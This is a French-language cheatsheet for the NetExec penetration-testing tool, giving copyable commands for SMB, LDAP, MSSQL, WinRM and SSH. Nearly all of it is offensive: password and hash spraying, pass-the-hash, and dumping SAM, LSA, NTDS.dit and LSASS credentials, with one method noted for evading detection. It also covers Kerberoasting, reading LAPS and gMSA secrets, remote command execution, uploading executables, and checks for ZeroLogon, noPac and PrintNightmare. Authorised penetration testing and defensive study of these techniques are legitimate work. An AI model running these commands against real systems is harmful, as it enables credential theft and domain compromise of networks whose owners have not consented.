Cheatsheets

NetExec

Cheatsheet complete nxc : SMB, LDAP, MSSQL, WinRM, SSH. Auth, enumeration, exploitation et modules.

Installation

Copy command
sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec

Description: Installe NetExec proprement via pipx depuis le depot officiel.

Copy command
nxc --version

Description: Verifie que le binaire est accessible et affiche la version installee.

Verify + Syntax

Copy command
nxc --help

Description: Affiche l'aide globale et la liste des protocoles disponibles.

Copy command
nxc smb --help

Description: Affiche toutes les options du module SMB.

Copy command
nxc <protocol> $TARGET -u $USER -p $PASS [options]

Description: Syntaxe commune a tous les protocoles.

Copy command
nxc smb $TARGET

Description: Cible : IP unique, plage CIDR, range ou fichier avec -t targets.txt.

Auth - Null Session

Copy command
nxc smb $TARGET -u '' -p ''

Description: Null session SMB : teste l'acces anonyme sans identifiants.

Copy command
nxc ldap $TARGET -u '' -p ''

Description: Null session LDAP : idem pour le protocole LDAP.

Auth - Guest

Copy command
nxc smb $TARGET -u 'Guest' -p ''

Description: Tente l'acces avec le compte Guest (souvent actif sur vieux postes).

Auth - Password

Copy command
nxc smb $TARGET -u $USER -p $PASS

Description: Authentification domaine classique user/password.

Copy command
nxc smb $TARGET -u $USER -p $PASS --local-auth

Description: Force l'authentification locale (hors contexte domaine).

Copy command
nxc smb $TARGET -u $USER -p $PASS -d $DOMAIN

Description: Specifies le domaine explicitement pour un contexte multi-domaines.

Auth - Pass-the-Hash

Copy command
nxc smb $TARGET -u $USER -H $NTHASH

Description: Authentification via hash NT (Pass-the-Hash) sans connaitre le mot de passe en clair.

Copy command
nxc smb $TARGET -u $USER -H $LMHASH:$NTHASH

Description: Format LM:NT complet si le LM hash est disponible.

Copy command
nxc smb $TARGET -u $USER -H $NTHASH --local-auth

Description: PTH en mode local-auth pour les comptes machine ou locaux.

Auth - Kerberos

Copy command
nxc smb $TARGET -u $USER -p $PASS -k

Description: Force l'authentification Kerberos au lieu de NTLM.

Copy command
nxc smb $TARGET -u $USER -p $PASS --use-kcache

Description: Utilise le cache Kerberos existant (ccache) plutot que de re-s'authentifier.

Copy command
KRB5CCNAME=$CCACHE nxc smb $TARGET -u $USER -p '' --use-kcache

Description: Injecte un ccache specifique (post-getTGT/getST) pour l'authentification.

Auth - Listes de credentials

Copy command
nxc smb $TARGET -u users.txt -p passwords.txt

Description: Cree le produit cartesien user x password (attention aux lockouts).

Copy command
nxc smb $TARGET -u users.txt -p passwords.txt --no-bruteforce

Description: Teste user[i]/pass[i] en mode paire lineaire, sans croisement.

Copy command
nxc smb $TARGET -u users.txt -H hashes.txt --no-bruteforce

Description: Spray de hashes NT contre une liste d'utilisateurs, un hash par user.

Copy command
nxc smb $TARGET -u users.txt -p passwords.txt --continue-on-success

Description: Continue apres le premier succes, utile pour identifier tous les comptes valides.

SMB - Verification

Copy command
nxc smb $TARGET

Description: Sonde SMB : hostname, domaine, OS, signing et version SMB.

Copy command
nxc smb $CIDR

Description: Discovery reseau : identifie tous les hotes SMB actifs sur un /24.

SMB - Enumeration

Copy command
nxc smb $TARGET -u $USER -p $PASS --users

Description: Liste les comptes utilisateurs du domaine via SMB.

Copy command
nxc smb $TARGET -u $USER -p $PASS --groups

Description: Liste les groupes du domaine et leurs membres.

Copy command
nxc smb $TARGET -u $USER -p $PASS --local-groups

Description: Enumere les groupes locaux de la machine cible.

Copy command
nxc smb $TARGET -u $USER -p $PASS --rid-brute

Description: Brute-force des RID pour decouvrir des comptes meme sans acces annuaire.

Copy command
nxc smb $TARGET -u $USER -p $PASS --sessions

Description: Affiche les sessions SMB actives sur la cible.

Copy command
nxc smb $TARGET -u $USER -p $PASS --loggedon-users

Description: Identifie les utilisateurs actuellement connectes sur la machine.

Copy command
nxc smb $TARGET -u $USER -p $PASS --pass-pol

Description: Recupere la politique de mot de passe du domaine (lockout threshold, etc.).

Copy command
nxc smb $TARGET -u $USER -p $PASS --gen-relay-list relay.txt

Description: Genere une liste d'hotes SMB ne forcant pas la signature (cibles relay).

SMB - Shares

Copy command
nxc smb $TARGET -u $USER -p $PASS --shares

Description: Enumere les partages accessibles et les permissions (READ/WRITE).

Copy command
nxc smb $TARGET -u '' -p '' --shares

Description: Meme chose en null session pour detecter les partages publics.

Copy command
nxc smb $TARGET -u $USER -p $PASS -M spider_plus

Description: Spider recursif de tous les partages accessibles, liste tous les fichiers.

Copy command
nxc smb $TARGET -u $USER -p $PASS -M spider_plus -o READ_ONLY=false

Description: Spider avec telechargement automatique des fichiers trouves.

SMB - File Operations

Copy command
nxc smb $TARGET -u $USER -p $PASS --get-file '\\share\path\file.txt' /local/dest.txt

Description: Telecharge un fichier depuis un partage SMB distant.

Copy command
nxc smb $TARGET -u $USER -p $PASS --put-file /local/file.exe '\\share\path\file.exe'

Description: Uploade un fichier local vers un partage SMB distant.

SMB - Command Execution

Copy command
nxc smb $TARGET -u $USER -p $PASS -x 'whoami'

Description: Execute une commande shell sur la cible via SMB (CreateProcess).

Copy command
nxc smb $TARGET -u $USER -p $PASS -X 'Get-Process'

Description: Execute une commande PowerShell sur la cible via SMB.

Copy command
nxc smb $TARGET -u $USER -p $PASS -x 'whoami' --exec-method smbexec

Description: Force le mode d'execution smbexec (moins bruyant que psexec).

Copy command
nxc smb $TARGET -u $USER -p $PASS -x 'whoami' --exec-method wmiexec

Description: Force le mode d'execution WMI (pas de service cree).

SMB - Credential Harvesting

Copy command
nxc smb $TARGET -u $USER -p $PASS --sam

Description: Dump les hashes du SAM local (comptes locaux uniquement).

Copy command
nxc smb $TARGET -u $USER -p $PASS --lsa

Description: Dump les secrets LSA (mots de passe services, cached creds, etc.).

Copy command
nxc smb $TARGET -u $USER -p $PASS --ntds

Description: Dump le NTDS.dit via VSS pour recuperer tous les hashes du domaine (DC uniquement).

Copy command
nxc smb $TARGET -u $USER -p $PASS --ntds --user $TARGET_USER

Description: Dump uniquement le hash d'un utilisateur specifique depuis NTDS.

Copy command
nxc smb $TARGET -u $USER -p $PASS -M lsassy

Description: Dump LSASS en memoire via lsassy pour extraire les credentials en clair.

Copy command
nxc smb $TARGET -u $USER -p $PASS -M nanodump

Description: Dump LSASS via nanodump (evasion meilleure qu'un dump classique).

Copy command
nxc smb $TARGET -u $USER -p $PASS -M gpp_password

Description: Cherche des mots de passe en clair dans les GPP (SYSVOL).

Copy command
nxc smb $TARGET -u $USER -p $PASS -M dpapi

Description: Tente de dechiffrer les secrets DPAPI de l'utilisateur connecte.

SMB - Vulnerability Scan

Copy command
nxc smb $TARGET -u $USER -p $PASS -M zerologon

Description: Detecte la vulnerabilite ZeroLogon (CVE-2020-1472) sur le DC.

Copy command
nxc smb $TARGET -u $USER -p $PASS -M petitpotam

Description: Teste la coercition PetitPotam (Printer Spooler / EfsRpc).

Copy command
nxc smb $TARGET -u $USER -p $PASS -M nopac

Description: Detecte la vulnerabilite noPac (CVE-2021-42278/42287).

Copy command
nxc smb $TARGET -u $USER -p $PASS -M printnightmare

Description: Detecte PrintNightmare (CVE-2021-1675) sur le spooler d'impression.

Copy command
nxc smb $TARGET -u $USER -p $PASS -M enum_av

Description: Enumere les produits antivirus installes sur la machine cible.

LDAP - Enumeration

Copy command
nxc ldap $TARGET -u $USER -p $PASS --users

Description: Liste les utilisateurs AD via LDAP.

Copy command
nxc ldap $TARGET -u $USER -p $PASS --groups

Description: Liste les groupes AD et leurs membres.

Copy command
nxc ldap $TARGET -u $USER -p $PASS --admin-count

Description: Trouve les objets proteges par AdminSDHolder (adminCount=1).

Copy command
nxc ldap $TARGET -u $USER -p $PASS --trusted-for-delegation

Description: Identifie les comptes avec unconstrained delegation.

Copy command
nxc ldap $TARGET -u $USER -p $PASS --password-not-required

Description: Trouve les comptes sans politique de mot de passe obligatoire.

Copy command
nxc ldap $TARGET -u $USER -p $PASS --find-delegation

Description: Decouvre toutes les configurations de delegation (constrained/unconstrained/RBCD).

LDAP - Kerberoasting / AS-REP

Copy command
nxc ldap $TARGET -u $USER -p $PASS --kerberoasting kerberoast.txt

Description: Recupere les TGS des comptes avec SPN pour crackage offline (Kerberoasting).

Copy command
nxc ldap $TARGET -u $USER -p $PASS --asreproast asrep.txt

Description: Recupere les AS-REP des comptes sans pre-auth Kerberos.

LDAP - BloodHound

Copy command
nxc ldap $TARGET -u $USER -p $PASS --bloodhound -c All

Description: Collecte toutes les donnees BloodHound CE (users, groups, sessions, ACLs, GPOs, trusts).

Copy command
nxc ldap $TARGET -u $USER -p $PASS --bloodhound -c DCOnly

Description: Collecte uniquement les donnees DC (plus rapide, moins de bruit reseau).

LDAP - ADCS / LAPS / gMSA

Copy command
nxc ldap $TARGET -u $USER -p $PASS -M adcs

Description: Enumere les Certificate Authority et templates ADCS, signale les mauvaises configs ESC.

Copy command
nxc ldap $TARGET -u $USER -p $PASS -M maq

Description: Verifie le Machine Account Quota (combien de comptes machine on peut creer).

Copy command
nxc ldap $TARGET -u $USER -p $PASS --laps

Description: Lit les mots de passe LAPS v1/v2 si les ACL le permettent.

Copy command
nxc ldap $TARGET -u $USER -p $PASS --gmsa

Description: Enumere les Group Managed Service Accounts et leurs attributs.

Copy command
nxc ldap $TARGET -u $USER -p $PASS --gmsa-convert-id

Description: Convertit un ID gMSA en nom lisible.

Copy command
nxc ldap $TARGET -u $USER -p $PASS --gmsa-decrypt-lsa

Description: Dechiffre les secrets gMSA stockes dans LSA si les droits le permettent.

MSSQL - Auth

Copy command
nxc mssql $TARGET -u $USER -p $PASS

Description: Authentification SQL Server en mode Windows (domaine).

Copy command
nxc mssql $TARGET -u $USER -p $PASS --local-auth

Description: Authentification SQL locale (SQL login, pas Windows auth).

Copy command
nxc mssql $TARGET -u $USER -p $PASS -d $DOMAIN

Description: Force le domaine pour l'authentification Windows sur MSSQL.

MSSQL - Queries

Copy command
nxc mssql $TARGET -u $USER -p $PASS -q 'SELECT @@version'

Description: Execute une requete SQL directement.

Copy command
nxc mssql $TARGET -u $USER -p $PASS -q 'SELECT name FROM sys.databases'

Description: Liste toutes les bases de donnees disponibles sur l'instance.

Copy command
nxc mssql $TARGET -u $USER -p $PASS --rid-brute

Description: Brute-force des RID pour cartographier les logins SQL et Windows.

MSSQL - Command Execution

Copy command
nxc mssql $TARGET -u $USER -p $PASS -x 'whoami'

Description: Execute une commande OS via xp_cmdshell (doit etre active ou activable).

Copy command
nxc mssql $TARGET -u $USER -p $PASS -X 'Get-Content C:\Windows\win.ini'

Description: Execute du PowerShell via xp_cmdshell.

MSSQL - File Operations

Copy command
nxc mssql $TARGET -u $USER -p $PASS --get-file 'C:\path\to\file.txt' /local/dest.txt

Description: Telecharge un fichier depuis la cible via MSSQL (BULK INSERT / OPENROWSET).

Copy command
nxc mssql $TARGET -u $USER -p $PASS --put-file /local/file.exe 'C:\Windows\Temp\file.exe'

Description: Uploade un fichier local sur la cible via MSSQL.

WinRM - Validation

Copy command
nxc winrm $TARGET -u $USER -p $PASS

Description: Valide les credentials sur WinRM et verifie si le compte est admin.

Copy command
nxc winrm $TARGET -u $USER -H $NTHASH

Description: Validation via hash NT sur WinRM (Pass-the-Hash).

Copy command
nxc winrm $TARGET -u users.txt -p passwords.txt --no-bruteforce

Description: Spray de credentials sur WinRM en mode paire lineaire.

WinRM - Command Execution

Copy command
nxc winrm $TARGET -u $USER -p $PASS -x 'whoami'

Description: Execute une commande shell sur la cible via WinRM.

Copy command
nxc winrm $TARGET -u $USER -p $PASS -X 'Get-LocalUser'

Description: Execute du PowerShell sur la cible via WinRM.

SSH - Auth & Execution

Copy command
nxc ssh $TARGET -u $USER -p $PASS

Description: Valide des credentials SSH sur la cible.

Copy command
nxc ssh $TARGET -u $USER --key-file ~/.ssh/id_rsa

Description: Authentification SSH par cle privee.

Copy command
nxc ssh $TARGET -u $USER -p $PASS -x 'whoami'

Description: Execute une commande sur la cible via SSH.